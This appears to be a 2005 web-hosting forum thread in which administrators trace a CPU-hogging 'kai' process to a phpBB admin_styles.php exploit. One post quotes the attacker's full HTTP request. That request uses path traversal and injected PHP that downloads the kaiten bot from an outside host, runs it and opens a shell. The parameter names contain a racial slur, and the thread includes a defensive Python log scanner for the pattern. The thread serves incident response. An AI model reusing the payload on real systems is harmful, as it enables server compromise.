Bash/Kai Crap

Discussion in 'General Discussion' started by adivity, Jun 8, 2005.

  1. adivity

    adivity Member

    Hey,

    Over the course of the last few weeks, a particular account on one of our servers has been sending the server CPU usage to 100% and making the server crawl.

    In TOP the service name is showing up as "kai" and the command is showing as "-bash". The account owner doesn't know what it is or where it's from and we can't seem to figure it out either.

    Does anyone have any ideas as to what it is and why it's sending the CPU usage to 100%?


    Thanks.
     
  2. AndyReed

    AndyReed Well-Known Member
    Look into the log file:
    tail -f /var/log/messages
     
  3. adivity

    adivity Member

    I found it. Ugh.

    Turns out the client was running phpBB and while she was logged in as an admin on phpBB, someone grabbed her session ID. They then used an exploit in phpBB to grab a file from a remote server and execute it. The file itself is a stored procedure virus.

    We're trying to find out what it actually did to the system right now.

    If any of you see a bash process called "kai" in top or in ps -ef, then the first place to look would be access logs for the user it's running under. You will probably see an HTTP request that looks like this:

    /forum/admin/admin_styles.php?mode=addnew
    &install_to=../../../../../../../../../../../../../../../../../../../tmp
    &sid=7cffad407438a8df03468d0329435865
    &niggaip=3423673
    &niggaport=23532
    &nigga=$a=fopen(\%22http://mitglied.lycos.de/k11234/kaiten\%22,\%22r\%22);$b=\%22\%22;while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen(\%22/tmp/.sesss_\%22,\%22w\%22);fwrite($a,$b);fclose($a);chmod(\%22/tmp/.sesss_\%22,0777);system(\%22/tmp/.sesss_%20\%22.$_REQUEST[niggaip].\%22%20\%22.$_REQUEST[niggaport].\%22%20-e%20/bin/sh\%22);

    Hope this helps someone. If anyone knows anything else about this, or the effects it has on
    the server, please let me know.
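    A defender-side check for the access-log pattern described above, added here as an example and not part of the original post. It runs over constructed sample lines (fake IPs, a placeholder host) in Apache combined log format and reports requests to admin_styles.php whose install_to climbs directories or whose parameters carry inline PHP calls:

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log lines (not from the original post). The second line mimics
# the shape of the request quoted above, with a placeholder host and fake addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Jun/2005:10:12:01 -0500] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.9 - - [08/Jun/2005:10:13:44 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../tmp&sid=0123456789abcdef0123456789abcdef&x=$a=fopen(%22http://PLACEHOLDER-HOST/f%22,%22r%22);system(%22/tmp/.sesss_%22); HTTP/1.1" 200 312 "-" "Mozilla/4.0"
203.0.113.7 - - [08/Jun/2005:10:14:02 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=templates/subSilver HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
TRAVERSAL_RE = re.compile(r'(?:\.\./){2,}')  # repeated ../ climbing out of the templates directory
PHP_CALL_RE = re.compile(r'\b(fopen|fwrite|fclose|chmod|system|exec|passthru|shell_exec)\s*\(', re.I)

def suspicious_params(query):
    """Return the reasons a query string looks like the admin_styles.php abuse, or [] if none."""
    reasons = []
    for field in query.split('&'):
        name, _, raw = field.partition('=')
        value = unquote_plus(raw)  # decode %22, %20 etc. before matching
        if name == 'install_to' and TRAVERSAL_RE.search(value):
            reasons.append('install_to traversal: ' + value)
        elif PHP_CALL_RE.search(value):
            reasons.append('PHP code in parameter %s: %s' % (name, ', '.join(PHP_CALL_RE.findall(value))))
    return reasons

def scan_access_log(text):
    """One finding per request to admin_styles.php that carries traversal or inline PHP."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group('target'))
        if not url.path.endswith('/admin/admin_styles.php'):
            continue
        reasons = suspicious_params(url.query)
        if reasons:
            findings.append({'ip': m.group('ip'), 'time': m.group('ts'),
                             'status': m.group('status'), 'reasons': reasons})
    return findings

if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_LOG):
        print(f['time'], f['ip'], f['status'])
        for r in f['reasons']:
            print('   ', r)
```

    Point it at the real log with scan_access_log(open('/home/username/access-logs/<domain>').read()); a 200 status on a flagged line means the request reached the script, so check /tmp and the process list for that user next.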
     
  4. webignition

    webignition Well-Known Member

    You may also want to take a look at /home/username/.bash_history to check for any obvious signs that this is a shell-initiated process and, if so, it may possibly be due to an SSH compromise.

    To be honest I can't say if this is the right direction in which to head, however it would be one of the first things I'd check.
     
  5. AndyReed

    AndyReed Well-Known Member
    There are many things you can do to secure your server, other than just looking into files. It is very crucial to protect and secure your server, otherwise, hackers and spammers will be very happy to use every drop of resource on your server.
     